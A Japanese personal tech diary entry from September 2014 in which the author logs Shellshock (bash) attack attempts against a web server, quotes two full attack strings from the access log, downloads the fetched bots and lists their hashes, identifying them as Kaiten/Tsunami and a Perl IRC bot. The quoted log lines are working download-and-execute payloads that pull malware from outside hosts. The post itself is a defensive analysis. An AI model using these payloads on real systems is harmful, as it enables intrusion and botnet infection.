トップ «前の日記(2014-09-26(Fri)) 最新 次の日記(2014-10-01(Wed))» 編集

屑俺日記

僕の備忘録(PC、UN*X、ネットワーク関連が中心)なんです。
自分の書いたところは適当(な時とか)に書き換えますので御了承を。

2014-09-29(Mon) 依然として秋晴れ

regular.bot

access.logに、 

194.209.220.10 - - [28/Sep/2014:16:57:30 +0900] 
"GET / HTTP/1.0" 200 3897 "-" "() { :;}; 
/bin/bash -c \"
wget http://stablehost.us/bots/regular.bot -O /tmp/sh;
curl -o /tmp/sh http://stablehost.us/bots/regular.bot;
sh /tmp/sh;
rm -rf /tmp/sh\""

なる一行。検索すると 似た報告が色々。
で、regular.botをdownloadしてみた。
他に4つばかりプログラムを/tmpの下にダウンロードして 実行し、crontabを書き換えて、削除する内容になっていた。
それも頂戴して見てみた。 

$ ls -l
合計 1116
-rw-rw-r-- 1 user group 982256  9月 29 08:11 a
-rw-rw-r-- 1 user group  42436  9月 29 08:11 darwin
-rw-rw-r-- 1 user group  39130  9月 29 08:11 kaiten.c
-rw-rw-r-- 1 user group  66395  9月 29 08:11 pl
-rw-rw-r-- 1 user group    701  9月 29 08:11 regular.bot
 
$ file *
a:           ELF 64-bit LSB executable,
 x86-64, version 1 (GNU/Linux), statically linked,
 for GNU/Linux 2.6.24, 
 BuildID[sha1]=0xd5fb250b91b5baf9874e986fd7d14f88e6d4e1d2,
 not stripped
darwin:      Mach-O 64-bit executable
kaiten.c:    ASCII English text, with very long lines
pl:          data
regular.bot: ASCII text
 
$ sha1sum *
889b8f612fe790b786f1184bebe9dd5bf86ce8f6  a
e75b8133404dcea606a04a8e4c03b0af8bec6d22  darwin
658daf96fa06636bb50af577a980529aa3282499  kaiten.c
62aed37b3e6fbe8ff6552e3cf87b78ed473a9a43  pl
edde96085b3a9c097b474d6345ab4166e28e4cff  regular.bot
 
$ sha256sum *
3cafb672d0bc1acfb4eb506050f71a2acf1b239a36102a101b4d52ce75749372  a
61c46e434a117294148a53997d9c1d7bca724e8c9cf429d0eb92e93585bdfac6  darwin
47e71a4de9351e90a884978f2984796c1d770cbb3010cfbe2d8600cf259b6832  kaiten.c
a2f7839d37825f097a17ff03ed6fd5205a97fb4f2651945390e347804fcd8391  pl
1bd24270449047e2d0df9f7a5ecf58fd0647e25b55328c52c6cff6629a118530  regular.bot

"kaiten.c"は1000行近くあるCのソース。もちろん侵入先でビルド、実行する。
これも かなりメジャーなものと見えた。
"pl"はPerl Script。これも2000行近くあった。
"darwin"を見ると、MacOSXもターゲットらしい。チェックサムで 検索すると、 Tsunamiとか呼ばれるバックドアの模様。

jiとjurat

bashの脆弱性攻撃もう一丁。 

173.45.100.18 - - [29/Sep/2014:10:18:21 +0900] 
"GET /cgi-bin/hi HTTP/1.0" 404 770 "-" 
"() { :;}; /bin/bash -c \"
cd /tmp;
wget http://213.5.67.223/ji;
curl -O /tmp/ji http://213.5.67.223/jurat ; 
perl /tmp/ji;
rm -rf /tmp/ji;
rm -rf /tmp/ji*\""

ji はwget できた。が、juratは"Not Found"であった。
LinuxNet Perlbotらしい。 

$ ls -l 
合計 20
-rw-rw-r-- 1 makoto makoto 16680  9月 29 00:44 ji
$ file ji
ji: a /usr/bin/perl\015 script, ASCII text executable,
 with CRLF line terminators
 
$ sha1sum ji 
dc788bfb3ef12016cdb53c904ef47cfd3f5d2a97  ji
 
$ sha256sum ji 
ef42439cb6b8dd9d7d28147efe2282502b4081487cb8df42cb5e9fade5b660d3  ji
[ツッコミを入れる]

リンクはご自由にどうぞ。でもURLや内容が変った場合はあしからず。

index.htmlは ここから。

Generated by tDiary version 5.2.4
Powered by Ruby version 3.1.2-p20